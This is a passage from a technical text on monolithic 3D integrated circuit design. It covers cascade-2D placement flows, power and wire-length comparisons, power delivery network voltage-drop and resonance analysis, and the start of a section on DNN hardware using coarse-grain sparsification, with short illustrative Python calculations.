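    paths={("A", "D"): 3, ("C", "D"): 2, ("E", "F"): 4, ("B", "C"): 1},
)
print(tiers, cross)
```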
At this stage, it is important to understand that there are two types of IO ports
in the design. There are a set of IO ports that were created because of the “design-
aware partitioning” step. These IO ports connect the top and bottom groups of the
design, and they are referred as MIV ports since they eventually become MIVs in an
M3D IC. Additionally, there exist a set of IO ports for the top-level pre-partitioned
design. These are same as the conventional IO ports of 2D ICs.
Leveraging the fact that all cell placement algorithms in commercial EDA tools tend to place cells
close to IO ports to minimize timing, the bottom group is implemented using the
location of MIVs determined from the top group implementation. In this way, the
cell placement of the top group guides the cell placement of the bottom group using
the pre-fixed MIV ports.
The IO ports of the top-level design are assumed to be connected only to the top
tier in M3D ICs. Therefore, it is possible that some IO signals need to be directly
connected to functional modules in the bottom group. These feed-through signals
will not have any driving or receiving cells on the top group. Hence, the MIV
ports for those signals cannot be placed during the top group implementation and are instead determined during the bottom group implementation.
Figure 11 shows the location of MIVs after implementing the bottom group.
After obtaining the location of complete set of MIVs, standard cell placement in the
top and bottom group implementation is discarded, and only the MIV locations are
retained.
Cascade-2D Stage
In this step, a cascade-2D design is implemented, which models an M3D IC in a
single 2D design with sets of anchor cells and dummy wires, using the partitioning technique supported in Cadence® Innovus™.
First, a new die with both tiers placed side by side is created, with the same total
area as the original 2D design. Top and bottom partitions are defined in the die, and
a hard fence for placement is set, so that cells in the top partition are placed only on
the top half of the die, and cells in the bottom partition only on the bottom half of
the die. Then, two hierarchies of the design are created as follows:
Fig. 12 GDS layouts in each step in cascade-2D design flow. (a) Top view after placing pins for
MIVs, (b) after assembling top view and top- and bottom-partition view, (c) after implementing
cascade-2D designs
• First level of hierarchy: Top view, which contains only two cells, top-partition cell
and bottom-partition cell. These two cells contain pins which represent MIVs for
the top and bottom tier, respectively.
• Second level of hierarchy: Top-partition cell, which contains the top-partition
view where standard cells from the top group are placed and routed.
• Second level of hierarchy: Bottom-partition cell, which contains the bottom-
partition view where standard cells from the bottom group are placed and routed.
In the top view, pins are placed, representing MIVs, in the top-partition cell
and bottom-partition cell on the top routing metal layer (i.e., M6 in Fig. 8). The
pin locations are the same as the MIV location derived in MIV Planning Stage.
Figure 12a shows placed pins for MIVs in the top view.
Then, using 3 ∼ 4 additional metal layers above the top routing metal layer used
in the actual design (i.e., M7 ∼ M8 in Fig. 8), the pins on the top-partition cell
and bottom-partition cell are routed and connected. As the location of the pins is
identical in the x-axis in the top- and bottom-partition cells, the routing tool creates
long vertical wires crossing two partition cells. These additional 3 ∼ 4 metal layers
used to connect the pins of the top- and bottom-partition cells are called "dummy wires" because their only function is to provide a logical connection between the two tiers
in the physical design. The delay and RC parasitics associated with these wires will
not be considered in the final M3D IC.
In an M3D IC, the topmost metal layer of the bottom tier is connected to the
bottommost metal layer of the top tier using an MIV. To emulate this connectivity
in a 2D IC where the top and bottom tiers are placed adjacent to each other,
a mechanism to connect the bottommost metal layer (i.e., M1 in Fig. 8) in the
top-partition view with the topmost metal layer (i.e., M6 in Fig. 8) in the bottom-
partition view is required. This is achieved through “anchor cells.” An anchor cell is
a dummy cell which implements buffer logic. Anchor cells model zero-delay virtual
connection between a dummy wire and one of the metal layers. After connecting
Fig. 13 Three types of anchor cells: (a) a top-tier-driving anchor cell, (b) a top-tier-receiving
anchor cell, and (c) a bottom-tier anchor cell
the two partition cells with dummy wires, anchor cells are placed below the pins in
each partition view. In this step, only anchor cells are placed but not logic cells.
Depending on the partition in which the anchor cell is used and the metal layer to which a dummy wire needs to be virtually connected, three flavors of anchor cells exist: (1) top-
tier-driving anchor cells (Fig. 13a), which are placed in the top partition, receiving
signals from M1 of top partition, and driving a dummy wire, (2) top-tier-receiving
anchor cells (Fig. 13b), which send signal in the reverse direction, and (3) bottom-
tier anchor cells (Fig. 13c), which are placed in the bottom partition, connecting
a dummy wire to top metal layer of the bottom partition. After placement, anchor
cells and the corresponding MIV ports are connected.
Next, all hierarchies are flattened, i.e., the top view and both partition views are
assembled projecting all anchor cells in two partition views and dummy wires in the
top view into a single design. Figure 12b shows the assembled design.
With the assembled design, the delay of dummy wires is set to zero, and anchor
cells and dummy wires are set to be fixed, so that their location cannot be modified.
These sets of anchor cells and dummy wires effectively act as “wormholes” which
connect the bottommost metal layer of the top partition and the topmost metal layer
of the bottom partition without delay emulating the behavior of MIVs (the MIV RC
parasitics are added in the final timing stage).
Then, the regular 2D IC design flow is performed, which involves all the design stages
including placement, post-placement optimization, clock tree synthesis (CTS), post-
CTS optimization, routing, and post-route optimization. Owing to (1) “wormholes,”
which provide virtual connection between the bottommost metal layer of the top
partition and the topmost metal layer of the bottom partition, and (2) the hard fence,
which sets the boundary for top and bottom partition, the tool places each tier in its
separate 2D partitioned space with virtual connections between them, resulting in a
cascade-2D design.
CTS in cascade-2D design flow is performed as regular 2D IC design flow.
A clock signal is first divided into two branches in the top partition. One of the
branches is used for generating the clock tree in the top partition, and the other
branch is connected to the bottom partition through a set of anchor cells and a
dummy wire and used for generating the clock tree in the bottom partition.
Figure 12c shows the resulting cascade-2D design. Although the delay of dummy
wires is set to zero, their RC parasitics still exist in this stage of the design.
Therefore, the cascade-2D design is again split into top and bottom partitions,
pushing all cells and wires to the corresponding partitions except dummy wires.
Then, RC parasitics for each partition are extracted. The final M3D IC is created by
connecting these two extracted designs with MIV RC parasitics. Timing and power
analysis is done on the final M3D IC.
Fig. 14 GDS layouts of (a) 28 nm 2D, (b) 28 nm cascade-2D M3D, (c) 14/16 nm 2D, (d)
14/16 nm cascade-2D M3D, (e) 7 nm 2D, and (f) 7 nm cascade-2D M3D ICs of the application
processor at 1.0 GHz
Fig. 15 Color map of functional modules in the 7 nm (a) 2D IC and (b) cascade-2D M3D IC of the commercial application processor at 1.0 GHz
node and design frequency. In the best-case scenario, the M3D IC shows 20% power reduction over the 2D IC (14/16 nm technology node at 1.1 GHz frequency) at the same performance point.
Fig. 17 Power saving of cascade-2D M3D (solid lines) and shrunk-2D M3D (dotted lines) ICs
over 2D ICs in 28 nm, 14/16 nm, and 7 nm technology nodes
Fig. 18 Wire-length reduction comparison between cascade-2D (solid lines) and shrunk-2D
(dotted lines) M3D ICs over 2D ICs
vertical integration between cells through MIVs. Table 4 compares the number of MIVs in shrunk-2D M3D and cascade-2D M3D ICs. Since shrunk-2D design flow
partitions cells into two tiers, whereas cascade-2D design flow partitions functional
blocks, the number of MIVs in shrunk-2D M3D ICs is an order of magnitude higher
Table 5 Normalized iso-performance comparison of 2D, shrunk-2D M3D, and cascade-2D M3D
ICs with application processor in 28 nm, 14/16 nm, and 7 nm technology nodes. All values are
normalized to corresponding 28 nm 2D parameters. Capacitance and power values are normalized
to 28 nm 2D total capacitance and 28 nm 2D total power, respectively
Parameters 2D: 28 nm 14/16 nm 7 nm Shrunk-2D saving: 28 nm 14/16 nm 7 nm Cascade-2D saving: 28 nm 14/16 nm 7 nm
Std. cell area 1 0.331 0.077 −7.6% −6.8% −7.5% −9.5% −11.9% −8.8%
Wire-length 1 0.728 0.404 −19.3% −24.1% −24.6% −11.9% −22.6% −12.2%
Wire cap 0.531 0.375 0.205 −18.1% −14.2% −13.7% −9.5% −19.7% −19.2%
Pin cap 0.469 0.422 0.203 −12.1% −6.3% −9.7% −11.1% −13.2% −7.9%
Total cap 1 0.797 0.408 −15.5% −10.1% −11.7% −9.6% −15.2% −12.9%
Internal 0.428 0.282 0.128 −4.8% −7.6% −4.7% −14.5% −15.2% −11.1%
power
Net 0.505 0.318 0.119 −13.4% −10.6% −10.1% −13.0% −20.8% −15.1%
switching
power
Leakage 0.066 0.002 0.000 −7.7% −4.0% −2.0% −9.5% −7.7% −2.8%
power
Total power 1 0.602 0.247 −9.3% −9.1% −7.2% −13.4% −18.1% −13%
than that in cascade-2D M3D ICs. Better wire-length savings using shrunk-2D
design flow can be attributed to the large number of MIVs.
The large number of MIVs in shrunk-2D M3D ICs helps to reduce wire-length,
but it also increases the total capacitance of MIVs, limiting the wire capacitance
reduction. As shown in Table 5, although shrunk-2D M3D ICs reduce more wire-length than cascade-2D M3D ICs in the 14/16 nm and 7 nm designs, the wire capacitance reduction of cascade-2D M3D ICs is higher than that of shrunk-2D M3D ICs. Additionally,
there is a negative impact of the large number of MIVs on the wire capacitance
mainly because of the bin-based partitioning scheme of shrunk-2D design flow
(Panth et al. n.d.). While the bin-based partitioning helps distribute cells evenly on
both tiers, it has a tendency to partition cells connected using local wires into two
tiers, increasing the wire capacitance.
On the other hand, cascade-2D M3D ICs save their power mainly by reducing
standard cell area. Shrunk-2D design flow uses a shrunk-2D design to estimate
the wire-length and the wire RC parasitics of the resulting M3D IC. However,
while shrinking process geometries, the minimum width of each metal layer is also scaled, and extrapolation is performed by the tools during RC extraction of wires.
This extrapolation tends to overestimate wire RC parasitics, especially in scaled
technology nodes, which results in a large number of buffers inserted in a design
to meet timing (Chang et al. 2017). Because buffers in cascade-2D design flow are inserted while implementing and optimizing the top and bottom partitions simultaneously with actual process geometries, cascade-2D design flow achieves more standard cell area savings than shrunk-2D design flow, as shown in Fig. 19.
With a reduction in standard cell area, the cell density of the M3D IC reduces
as well. Hence, leveraging this feature of M3D ICs to increase cell density and
reduce die area, two separate M3D ICs are implemented using cascade-2D design
flow, one with the same total die area as the 2D IC and another with 10% reduced
area. Table 6 shows that similar power savings can be achieved with a reduced die
area M3D IC. The ability to get reduced die area makes M3D stacking technology
extremely attractive for mainstream adoption because less area directly translates to
reduced costs.
Standard cell area reduction affects both internal power and pin capacitance switching power, whereas wire-length reduction reduces only wire capacitance switching power. Figure 20 shows the power breakdown of 2D, cascade-2D M3D,
and shrunk-2D M3D ICs. As shown in the figure, the internal power and pin
capacitance switching power, which depend on the standard cell area, account for
Fig. 19 Standard cell area saving in cascade-2D (solid lines) and shrunk-2D (dotted lines) M3D
ICs over 2D ICs
Fig. 20 Breakdown of the power consumption of 2D, shrunk-2D, and cascade-2D M3D ICs in foundry 28 nm, 14/16 nm, and 7 nm technology nodes at 1.0 GHz
over 70% of the total power, and they contribute even more in the 14/16 nm and 7 nm designs. Because cascade-2D M3D ICs reduce more standard cell area than shrunk-2D M3D ICs, thereby attacking the components that make up over 70% of the total power, they consistently achieve better power savings, even though their wire-length reduction is smaller than that of shrunk-2D M3D ICs.
Challenges in designing a reliable power delivery network (PDN) increase mainly due to lower supply voltage, faster operating clock frequency, and higher power density. Along with a restricted
budget of resources and cost, these challenges may cause functional failures and
performance degradation due to parasitics-induced voltage drop in a non-ideal PDN.
The total voltage drop is decomposed into a resistive component (IR-drop) and
an inductive component (Ldi/dt-drop). Increasing the metallization in a PDN can
mitigate the resistive component of the voltage drop using wider interconnects while
taking into account routing resources and cost budget.
Meanwhile, the inductance of a package including controlled collapse chip connection (C4) bumps leads to significant Ldi/dt-drop due to time-varying current
drawn by cells in a die. In order to mitigate this drop, decoupling capacitors (decaps)
are utilized for local charge storage. Decaps can be placed on a die with decoupling
cells (decap cells), or explicitly added in the package. However, this decap along
with resistance and inductance of a PDN forms an RLC circuit resulting in its own
resonance frequency (Larsson 1998). If the resonance frequency lies in the system's operating frequency range, a significant Ldi/dt-drop can be induced, and hence, it is
crucial to have low input impedance across a wide range of frequencies.
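The resonance concern can be illustrated with a first-order model. The sketch below, using assumed R, L, and C values, computes the input impedance seen by on-die switching current when a decoupling capacitance shunts the resistive-inductive package path; the impedance peaks near the anti-resonance frequency 1/(2π√(LC)).

```python
import numpy as np

# First-order PDN input-impedance model with assumed, illustrative values:
# package resistance and inductance (R, L) in parallel with on-die
# decoupling capacitance C, as seen by the switching current on the die.
R, L, C = 1e-3, 100e-12, 100e-9      # ohm, henry, farad (assumptions)

f = np.logspace(6, 10, 401)           # 1 MHz .. 10 GHz
w = 2 * np.pi * f
z_pkg = R + 1j * w * L                # resistive-inductive package/C4 path
z_cap = 1 / (1j * w * C)              # decoupling-capacitor path
z_in = z_pkg * z_cap / (z_pkg + z_cap)

f_res = 1 / (2 * np.pi * np.sqrt(L * C))   # anti-resonance of the RLC loop
print(f"anti-resonance near {f_res / 1e6:.0f} MHz, "
      f"peak |Z| about {np.abs(z_in).max():.2f} ohm")
```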
While the PDNs of 2D ICs (i.e., 2D PDNs) have been explored actively (Larsson 1998; Pant and Chiprout 2006), the PDNs of M3D ICs (i.e., M3D PDNs) have
not been studied widely. A study for a system-level PDN for TSV-based 3D ICs
is presented in Khan et al. (2011), but the PDNs in M3D ICs and in TSV-based
3D ICs show quite different characteristics due to their tier-connection method
and achievable vertical integration density. In TSV-based 3D ICs, supply power is
delivered directly to power pads of each tier through dedicated power TSVs, forming
parallel resistive paths between multiple tiers. However, in M3D ICs, instead of having external power pads on the bottom tier, power MIVs are utilized to connect the bottommost metal layer of the top-tier PDN to the topmost metal layer of the bottom-tier PDN, forming series resistive paths across multiple tiers, which makes bottom-tier cells experience much longer resistive paths than in TSV-based 3D ICs. Furthermore, irregular power MIV placement, dictated by the cells on the top tier, makes the power delivery issue more complicated in M3D ICs. For these reasons, M3D ICs suffer much higher voltage drop in the static mode than TSV-based 3D ICs, especially on the bottom-tier cells, as shown in Table 7 (Khan et al. 2011).
Although the series resistive paths of an M3D PDN worsen the voltage drop in the static mode, they benefit the voltage drop in the dynamic mode by improving resiliency against AC current noise, as will be discussed later. Thus, the difference in the voltage drop between the 2D and the M3D IC in the dynamic mode is 7.3%, which is similar to TSV-based 3D ICs (Khan et al. 2011).
The PDNs of 2D and M3D ICs are compared taking two analysis modes into
account. The static mode is a vector-less analysis mode wherein the switching
activity of cells is averaged into a single instance. In the dynamic mode, a real
workload-based (i.e., vector-based) power analysis is performed for a given period
of time. The dynamic mode thus incorporates the impact of inductive transients by
taking into account workload-dependent time-varying current flow.
3 We used the shrunk-2D design flow in this study instead of other flows published in the literature because shrunk-2D was the only flow that supported PDN routing at the time of writing. However, our results should not depend heavily on which M3D signal routing flow is used in the overall flow.
Table 8 Width, pitch, and utilization of the 2D and M3D PDNs. Same specs are used for both 2D
and M3D (both top and bottom tier) ICs
Metal layer Direction Width (μm) Pitch (μm) Utilization
M2 H 0.07 1.4 10.0%
M5 V 0.28 14 20.6%
M6 H 0.28 14 20.6%
M7 V 0.8 42 11.1%
Table 9 Design metrics and decoupling capacitance of the created decap cells
Cell name Cell width (μm) Cell height (μm) Capacitance (fF)
DECAP_×1 0.19 1.4 3.4
DECAP_×2 0.38 1.4 6.8
DECAP_×4 0.76 1.4 13.7
DECAP_×8 1.52 1.4 27.3
DECAP_×16 3.04 1.4 54.7
DECAP_×32 6.08 1.4 109.4
M2 and M5 power rails are connected with only via arrays, which cross M3 and M4.
M5 to M7 power rails form a mesh structure to distribute power across the chip.
Since NanGate FreePDK45 Open Cell Library does not provide decap cells,
decap cells are created with various sizes for the experiment. Table 9 shows the
size and decoupling capacitance of the decap cells. The decoupling capacitance of
each cell is derived using the method presented in Bozorgzadeh and Afzali-Kusha
(2008). With the fully placed-and-routed 2D and M3D ICs, decap cells are first placed next to the clock buffers driving the clock pins of flip-flops, which usually suffer from high Ldi/dt-drop. Then, the remaining decap cells are placed in the empty areas of the designs to meet a target decoupling capacitance for the chip.
The power and ground pads of the designs are located on the top metal layer (M7 for the 2D ICs, M7 of the top tier for the M3D ICs) with 120 μm spacing, modeling the C4 bumps of the designs.
Analysis Methods
Figure 23 shows the number of switched cells in the DCT design during a workload-
based simulation. The vector-based power consumption in Table 10 is measured
during the time step which shows the highest switching activity throughout the
simulation (blue bar in Fig. 23), while the statistical power consumption of the designs is calculated assuming switching ratios of 20% and 10% for the primary inputs and sequential logic, respectively. Therefore, the dynamic power (i.e., internal + net switching power) shows a significant difference between the two analysis methods, whereas the static power (i.e., leakage power) remains similar.
The M3D ICs offer a power benefit over their 2D counterparts. Since M3D ICs utilize short vertical connections with MIVs instead of long metal wires on the xy-plane, the wire-length of the designs is reduced as shown in Table 10, offering net switching power savings. In addition, since the cells drive a reduced wire-load, the number of buffers as well as the drive-strength of the cells decreases, which, in turn, reduces the standard cell area, thereby benefiting the internal and leakage power consumption.
Fig. 23 Number of switched cells in a DCT design during a workload-based simulation. Only the time period showing the highest switching activity (blue bar) is used for the analysis
The instance voltage drop, i.e., the voltage drop a cell experiences, is used and is defined in Eq. 5:

$$V_{\mathrm{inst}} = \left(V_{DD,\mathrm{nom}} - V_{DD,\mathrm{act}}\right) + \left(V_{SS,\mathrm{act}} - 0\right), \tag{5}$$

where $V_{\mathrm{inst}}$ is the instance voltage drop and $V_{DD,\mathrm{nom}}$ is the nominal supply voltage. $V_{DD,\mathrm{act}}$ and $V_{SS,\mathrm{act}}$ are the actual voltage levels at the power and ground pins of the cell. The instance voltage drop can be further decomposed into the voltage drops on each metal layer.
Figure 24 shows the decomposed voltage drop at each metal layer (voltage values in black) for the cell experiencing the worst instance voltage drop in the static rail analysis of the JPEG M3D IC, showing how much IR-drop the power rails in each metal layer have contributed to the total instance IR-drop.
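To make this decomposition concrete, the short Python sketch below recomputes the worst instance drop from the per-layer rail drops reported in Fig. 24. The ground path is treated as ideal since Fig. 24 shows only the power side, and all variable names are ours, not from the study:

```python
# A minimal sketch of the Eq. 5 decomposition, using the per-layer power-rail
# drops from Fig. 24 (JPEG M3D IC, worst static instance). The ground path is
# assumed ideal (V_SS,act = 0) since Fig. 24 shows only the power side.
VDD_NOM = 1.100  # nominal supply voltage in volts

# IR-drop contributed by each metal layer along the delivery path (volts)
layer_drops = {
    "SYS": 0.0056,
    "M7T": 0.0275, "M6T": 0.0123, "M5T": 0.0036, "M2T": 0.0032, "M1T": 0.0015,
    "M7B": 0.0071, "M6B": 0.0019, "M5B": 0.0004, "M2B": 0.0021, "M1B": 0.0013,
}

def instance_voltage_drop(vdd_act, vss_act=0.0):
    """Eq. 5: V_inst = (V_DD,nom - V_DD,act) + (V_SS,act - 0)."""
    return (VDD_NOM - vdd_act) + (vss_act - 0.0)

vdd_act = VDD_NOM - sum(layer_drops.values())       # voltage at the cell pin
print(f"V_DD,act = {vdd_act * 1000:.1f} mV")        # ~1033.5 mV, cf. Fig. 24
print(f"V_inst   = {instance_voltage_drop(vdd_act) * 1000:.1f} mV")  # ~66.5 mV
```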
Fig. 24 Illustration describing how the worst instance IR-drop can be decomposed into each metal
layer, showing voltage drops on the power rails in each metal layer (values in black) and voltage
level on each metal layer along the IR-drop path (values in red)
Fig. 25 Breakdown of the worst instance IR-drop across the metal layers comparing 2D and
M3D ICs. M7B denotes M7 of the bottom tier in the M3D ICs. SYS represents the system model
including C4 bump, package, and PCB model
The current flowing through the power rails of the top tier is greater than that of the bottom tier (e.g., IM7_T > IM7_B in Fig. 26) since top-tier metal layers deliver current to both top- and bottom-tier cells, whereas only the current drawn by bottom-tier cells flows on bottom-tier metal layers. Therefore, the minimum IR-drop path in Fig. 26 to deliver power to a bottom-tier cell utilizes
the minimum length of top-tier power rails. However, this path can be blocked by a missing power MIV. Power MIVs are absent where top-tier cells are placed, since MIVs cannot penetrate those cells without destroying their active areas. In this case, the current needs to flow through an alternative path, shown as the actual path in Fig. 26, which utilizes longer top-tier metal wires and hence exhibits worse IR-drop due to the higher current in those wires.
The reduced number of C4 bumps in M3D ICs also degrades voltage integrity. As the footprint of an M3D IC is half that of its 2D counterpart, the number of C4 bumps that can be placed on an M3D IC is approximately half of that in the 2D IC, as shown in Table 10. This affects the amount of current flowing through each C4 bump. Table 11 compares the current flowing through C4 bumps in the 2D and M3D ICs. Up to 155.7% higher current flows through the C4 bumps in the M3D ICs, incurring a significant difference in IR-drop on the top metal layers (i.e., M7 and M6 in Fig. 25).
Fig. 27 Breakdown of the worst instance dynamic voltage drop (= IR-drop + Ldi/dt-drop) across
the metal layers comparing 2D and M3D ICs
Fig. 28 Comparison of the worst voltage drop experienced at C4 bumps showing the impact of
decoupling capacitance in 2D and M3D ICs. The decoupling capacitance is set to 30% of the total
capacitance of each design
The decoupling capacitances form RLC circuits with the corresponding inductors, each exhibiting its own resonance frequency.
To perform an in-depth frequency- and time-domain analysis on a PDN, a
reasonable die model which represents 2D and M3D full-chip System-on-Chip
(SoC) is needed. Since the benchmarks used in this work are small compared to full-
chip SoCs, their parameters are used to create a full-chip die model. Table 12 shows
the effective resistance and capacitance of the PDN of each benchmark (RPDN,eq
and CPDN,eq + CDIE_DC,eq in Fig. 21, respectively). As a design becomes larger, the capacitance of its PDN increases due to the increased ground and coupling capacitance of the PDN, while the resistance becomes smaller because more parallel resistive paths to the cells are available. To ease modeling, the average of the RC products from the three benchmarks is used, and a full-chip die is modeled by assuming CPDN,eq + CDIE_DC,eq = 10 nF, resulting in associated resistances of 7.87 mΩ and 18.9 mΩ for the 2D and M3D ICs, respectively.
Fig. 29 Impedance seen from the die by sweeping the frequency of the AC load current source, ILOAD,eq
Figure 29 shows the frequency response of the 2D and M3D full-chip
SoC sweeping the frequency of the AC load current source, ILOAD,eq . Three
resonance frequency points are observed, first-order resonance caused by
CPDN,eq + CDIE_DC,eq coupled with LC4 , second-order resonance by CPKG_DC with
LPKG, and third-order resonance by CBULK_DC with LPCB. While the third-order and second-order resonances occur in the kHz and MHz ranges, respectively, the largest resonance, the first-order resonance, lies between 50 MHz and 200 MHz. Although the M3D IC shows a 16.7% increase at the second-order resonance frequency, since the operating frequencies of full-chip SoCs at advanced technology nodes fall in the range of the first-order resonance frequencies, it is crucial to minimize the first-order resonance impact for a robust PDN.
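As a hedged illustration of this frequency-domain behavior, the sketch below sweeps the impedance of a simplified first-order die model. The resistances (7.87 mΩ and 18.9 mΩ) and the 10 nF capacitance follow the text; the inductance L_C4 = 0.2 nH is our assumption, chosen so the resonance lands near the reported ~112 MHz, and the package/PCB stages responsible for the second- and third-order resonances are omitted:

```python
import numpy as np

# Simplified first-order PDN model: the on-die capacitance in parallel with
# the series R-L path back to the supply. R and C follow the text; L_C4 is
# an assumed value (not given in the study).
R_2D, R_M3D = 7.87e-3, 18.9e-3     # effective PDN resistance (ohm)
C_DIE = 10e-9                       # C_PDN,eq + C_DIE_DC,eq (farad)
L_C4 = 0.2e-9                       # assumed C4/package inductance (henry)

f = np.logspace(6, 10, 4000)        # sweep 1 MHz .. 10 GHz
w = 2 * np.pi * f

def z_die(r):
    """|Z| seen by the die load current source, ILOAD,eq."""
    z_cap = 1.0 / (1j * w * C_DIE)
    z_rl = r + 1j * w * L_C4
    return np.abs(z_cap * z_rl / (z_cap + z_rl))

for name, r in [("2D", R_2D), ("M3D", R_M3D)]:
    z = z_die(r)
    k = int(np.argmax(z))
    print(f"{name}: peak |Z| = {z[k]:.2f} ohm at {f[k] / 1e6:.0f} MHz")
# The higher M3D series resistance damps the peak, qualitatively matching
# the lower first-order peak impedance (35.9% lower) reported in the text.
```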
As shown in the figure, the M3D IC exhibits 35.9% lower peak impedance at the first-order resonance frequency because of the high effective resistance of the M3D PDN due to its series resistive paths across tiers. Interestingly, the high resistance of M3D PDNs, which worsens IR-drop, in fact improves resiliency against AC current noise by damping the worst-case resonance oscillation. Figure 30a and b shows the improved resiliency of the M3D PDN through the time-domain response to a unit step, which models in-rush current, and to a 112 MHz (first-order resonance frequency) unit sine-wave load current source. Equation 6 describes the die voltage response governed by the first-order resonance for a unit step load current source (Pant and Chiprout 2006):
$$V_{\mathrm{DIE}} \cong 2R + \sqrt{\frac{2L_{C4}}{C_{\mathrm{DIE,eq}}}}\; e^{-\frac{R}{2L_{C4}}t}\, \sin\!\left(\omega_r t - \theta\right), \tag{6}$$

Fig. 30 Transient voltage response for (a) a unit step and (b) a unit 112 MHz (first-order resonance frequency) sine-wave load current source, ILOAD,eq. Third-order resonance is not shown in (a) for brevity
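Under the same assumed element values, the step response of Eq. 6 can be evaluated directly; the phase offset θ is set to 0 purely for illustration. The decay time constant 2L_C4/R shows why the more resistive M3D PDN damps the in-rush ringing faster, as in Fig. 30:

```python
import numpy as np

L, C, theta = 0.2e-9, 10e-9, 0.0          # assumed L_C4, C_DIE,eq, phase
t = np.linspace(0.0, 100e-9, 2001)        # 100 ns window
w_r = 1.0 / np.sqrt(L * C)                # ~112 MHz first-order resonance

for name, R in [("2D", 7.87e-3), ("M3D", 18.9e-3)]:
    # Eq. 6: V_DIE ~= 2R + sqrt(2L/C) * exp(-R*t/(2L)) * sin(w_r*t - theta)
    v = (2 * R + np.sqrt(2 * L / C) * np.exp(-R * t / (2 * L))
         * np.sin(w_r * t - theta))
    print(f"{name}: peak {v.max():.3f} V per unit A, "
          f"decay tau = {2 * L / R * 1e9:.0f} ns")
```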
DNNs have become ubiquitous in many machine learning applications, from speech
recognition (Deng et al. 2013; Graves et al. 2013) and natural language processing
(Conneau et al. 2017), to image recognition (Krizhevsky et al. 2012; He et al.
2015) and computer vision (Karpathy and Fei-Fei 2017). Large neural network models have proven to be very powerful in all the stated cases, but implementing them efficiently in hardware remains challenging.
DNN Topology
Starting from a fully connected DNN, a Gaussian Mixture Model (GMM) is adopted
for acoustic modeling (Su et al. 2010). Since it has been shown that DNNs in
Fig. 31 Candidate DNN topologies for acoustic modeling: 440 fMLLR input features, four hidden layers (L1–L4) with a configurable number of neurons per layer (e.g., 1,024), and 1,947 HMM state outputs
$$E = -\sum_{i=1}^{N} t_i \cdot \ln\left(y_i\right), \tag{7}$$
where N is the size of the output layer, yi is the ith output node, and ti is the ith target
value or label. The mini-batch stochastic gradient method (Gardner 1984) is used to
update the weights. The weight Wij is updated in the (k + 1)th iteration using Eq. 8.
$$W_{ij}^{k+1} = W_{ij}^{k} + C_{ij}\left(-lr \cdot \Delta W_{ij}^{k} + m \cdot \Delta W_{ij}^{k-1}\right), \tag{8}$$
where m is the momentum, lr is the learning rate, and Cij is the binary connection
coefficient between two subsequent neural network layers for CGS. In CGS, only
the weights that correspond to the location where Cij = 1 are updated. The change
in weight for each iteration is the differential of the cost function with respect to the
weight value:
$$\Delta W = \frac{\delta E}{\delta W}, \tag{9}$$
such that the loss reduces in each iteration. The training procedure is performed on
a graphics processing unit (GPU) with 32-bit floating point values.
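The NumPy sketch below restates Eqs. 7 and 8: a cross-entropy loss and one CGS-masked, momentum-based weight update. The shapes, hyperparameters, and random mask are illustrative assumptions, not the study's training setup; a real CGS mask is block-structured, as sketched in the next subsection:

```python
import numpy as np

rng = np.random.default_rng(0)
W = rng.standard_normal((1024, 1024)).astype(np.float32) * 0.01
C = (rng.random((1024, 1024)) < 0.125).astype(np.float32)  # toy binary mask
dW_prev = np.zeros_like(W)                                  # Delta W^{k-1}

def cross_entropy(y, t):
    """Eq. 7: E = -sum_i t_i * ln(y_i)."""
    return -np.sum(t * np.log(y))

def cgs_update(W, dW, dW_prev, C, lr=0.01, m=0.9):
    """Eq. 8: only weights where C_ij = 1 receive the SGD/momentum update."""
    return W + C * (-lr * dW + m * dW_prev)

dW = rng.standard_normal(W.shape).astype(np.float32)        # stand-in gradient
W = cgs_update(W, dW, dW_prev, C)
```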
After training, feed-forward computation is performed for classification, through
matrix vector multiplication of weight matrices and neuron vectors in each layer
to obtain the output of the final layer. The Rectified Linear Unit (ReLU) function
(Krizhevsky et al. 2012) is used for the non-linear activation function at the end of
each hidden layer.
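A minimal sketch of this feed-forward classification pass, assuming the 440-input, four-hidden-layer, 1,947-output topology used in this design (random weights stand in for trained ones):

```python
import numpy as np

rng = np.random.default_rng(1)
dims = [440, 1024, 1024, 1024, 1024, 1947]   # fMLLR in, L1-L4, HMM states out
weights = [rng.standard_normal((o, i)).astype(np.float32) * 0.01
           for i, o in zip(dims[:-1], dims[1:])]

def forward(x):
    for k, W in enumerate(weights):
        x = W @ x                              # matrix-vector multiplication
        if k < len(weights) - 1:
            x = np.maximum(x, 0.0)             # ReLU on hidden layers only
    return x

scores = forward(rng.standard_normal(440).astype(np.float32))
print(scores.shape)                            # (1947,) HMM-state scores
```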
Coarse-Grain Sparsification
To efficiently map sparse weight matrices to memory arrays, CGS methodology
(Kadetotad et al. 2016) is employed. In CGS, connections between two consecutive
layers in a DNN are compressed in a block-wise manner. An example of block-
wise weight compression is demonstrated in Fig. 32. For a given block size of
16 × 16, it reduces a 1024 × 1024 weight matrix to 64 × 64 weight blocks. With
a compression ratio of 87.5%, only eight weight blocks (= 12.5%) remain non-zero for each block row, thus allowing efficient compression of the entire weight matrix with minimal indexing overhead.
Fig. 32 An example of block-wise weight compression in CGS. A 1024 × 1024 weight matrix is divided into 64 × 64 weight blocks with each weight block having 16 × 16 weights (i.e., block size of 16 × 16). A total of 87.5% of weight blocks are dropped using CGS. The remaining 12.5% weight blocks are stored in memory
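The sketch below builds such a block-wise mask for a 1024 × 1024 matrix with a 16 × 16 block size and an 87.5% compression ratio. The text does not specify how the surviving blocks are chosen during training, so block L2 norm is used here purely as a plausible stand-in criterion:

```python
import numpy as np

B = 16                                      # block size
rng = np.random.default_rng(2)
W = rng.standard_normal((1024, 1024)).astype(np.float32)

nb = W.shape[0] // B                        # 64 blocks per side
blocks = W.reshape(nb, B, nb, B).swapaxes(1, 2)   # shape (64, 64, 16, 16)
norms = np.linalg.norm(blocks, axis=(2, 3))       # per-block L2 norm

keep = max(1, int(round(nb * 0.125)))       # 8 surviving blocks per block row
mask = np.zeros((nb, nb), dtype=bool)
for r in range(nb):
    mask[r, np.argsort(norms[r])[-keep:]] = True  # keep the largest blocks

# Expand the block mask back to weight granularity (the C_ij of Eq. 8)
C = np.kron(mask, np.ones((B, B), dtype=np.float32))
print(f"kept {mask.mean():.1%} of blocks -> {int(C.sum())} weights stored")
```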
CGS, when compared to recent neural network compression algorithms such as
in Han et al. (2016) and Cheng et al. (2015), offers simpler hardware implementation
through CGS multiplexers and multiplier-accumulators (MACs). In Han et al.
(2016), a complex sparse matrix vector multiplication module is required. On the
other hand, the methodology in Cheng et al. (2015) offers to reduce the order
of computations needed for a matrix of size n to O(nlogn) and reduce the space
required to store the matrix to O(n). However, there is considerable loss in accuracy
